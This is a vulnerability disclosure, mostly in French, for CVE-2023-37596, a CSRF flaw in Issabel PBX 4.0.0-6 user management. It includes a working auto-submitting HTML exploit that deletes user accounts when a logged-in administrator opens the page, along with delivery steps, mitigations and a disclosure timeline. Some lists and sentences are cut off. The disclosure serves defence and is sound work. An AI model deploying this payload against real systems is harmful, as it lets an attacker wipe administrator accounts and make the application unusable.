
CVE-2023-37596 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in Issabel PBX version 4.0.0-6, a widely used open-source Unified Communications platform.
Sévérité: Élevée | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
Une vulnérabilité de Cross-Site Request Forgery (CSRF) a été découverte dans Issabel PBX version 4.0.0-6. Le point de terminaison de gestion des utilisateurs n'implémente aucune protection CSRF, ce qui permet à un attaquant distant non authentifié de créer une page web malveillante qui — lorsqu'elle est visitée par un administrateur Issabel authentifié — supprime silencieusement n'importe quel compte utilisateur du système. Une exploitation répétée peut rendre l'ensemble de l'application inaccessible en supprimant tous les utilisateurs administratifs.
Étant donné qu'Issabel PBX ne valide pas l'origine des requêtes modifiant l'état de son interface de gestion des utilisateurs, une attaque CSRF réussie permet à un attaquant de :
| Produit | Version concernée | Statut |
|---|---|---|
| issabel-pbx | 4.0.0-6 | Vulnérable |
Un attaquant héberge une page HTML malveillante contenant une requête HTTP falsifiée ciblant le point de terminaison de suppression d'utilisateur de l'application Issabel PBX. L'attaque est déclenchée automatiquement (ou par un clic sur un bouton) lorsqu'un utilisateur déjà authentifié dans Issabel visite la page malveillante dans le même navigateur. Étant donné que le navigateur inclut automatiquement les cookies de session de la victime avec chaque requête, le serveur accepte la requête de suppression falsifiée comme légitime.
Aucun privilège spécial n'est requis du côté de l'attaquant — seulement un vecteur d'ingénierie sociale (lien de phishing, publicité malveillante, etc.) pour attirer l'administrateur authentifié vers la page conçue.
Caractéristiques clés de cette attaque :
id=1, id=2, …) peut être ciblé en modifiant la charge utile.Accédez à la page de liste des utilisateurs Issabel PBX et authentifiez-vous avec les identifiants d'administrateur :
https://<Issabel-IP>/index.php?menu=userlist


Burp Suite produira une page HTML similaire à celle ci-dessous. Enregistrez-la sous forme de fichier .html (par exemple, csrf_exploit.html) :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Remarque : Remplacez
<Issabel-IP>par l'adresse IP ou le nom d'hôte du serveur cible, et ajustez la valeuridpour cibler un autre compte utilisateur.
Envoyez le fichier csrf_exploit.html (ou un lien vers l'endroit où il est hébergé) à un utilisateur actuellement connecté à Issabel PBX. Lorsque la victime ouvre la page, le formulaire est soumis automatiquement et l'utilisateur cible est supprimé sans aucune invite de confirmation.


Les défenses suivantes doivent être appliquées par le fournisseur et/ou les administrateurs système pour corriger cette vulnérabilité :
SameSite du cookie — Définir l'attribut SameSite du cookie de session sur Strict ou Lax pour empêcher les requêtes cross-origin de transporter le cookie de session dans la plupart des navigateurs.Origin / Referer — Côté serveur, rejeter toute requête modifiant l'état dont l'en-tête Origin ou Referer ne correspond pas au domaine de l'application.Jusqu'à ce qu'un correctif du fournisseur soit disponible, il est conseillé aux administrateurs de :
| Date | Événement |
|---|---|
| 10/07/2023 | Vulnérabilité découverte et signalée |
| 10/07/2023 | CVE-2023-37596 attribué |
Sahil Ojha
Avertissement : Ce dépôt est publié uniquement à des fins éducatives et de divulgation responsable. Les informations fournies ici ne doivent pas être utilisées pour attaquer des systèmes sans autorisation écrite explicite du propriétaire du système. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.
| Champ | Valeur |
|---|
| Identifiant CVE | CVE-2023-37596 |
| Type de vulnérabilité | Cross-Site Request Forgery (CSRF) |
| CWE | CWE-352 |
| Produit | Issabel PBX |
| Version vulnérable | 4.0.0-6 |
| Page d'accueil du fournisseur | https://www.issabel.org/ |
| Dépôt logiciel | https://github.com/IssabelFoundation/issabelPBX |
| Testé sur | Windows |
| Publié CVE | 10/07/2023 |
| Découvert par | Sahil Ojha |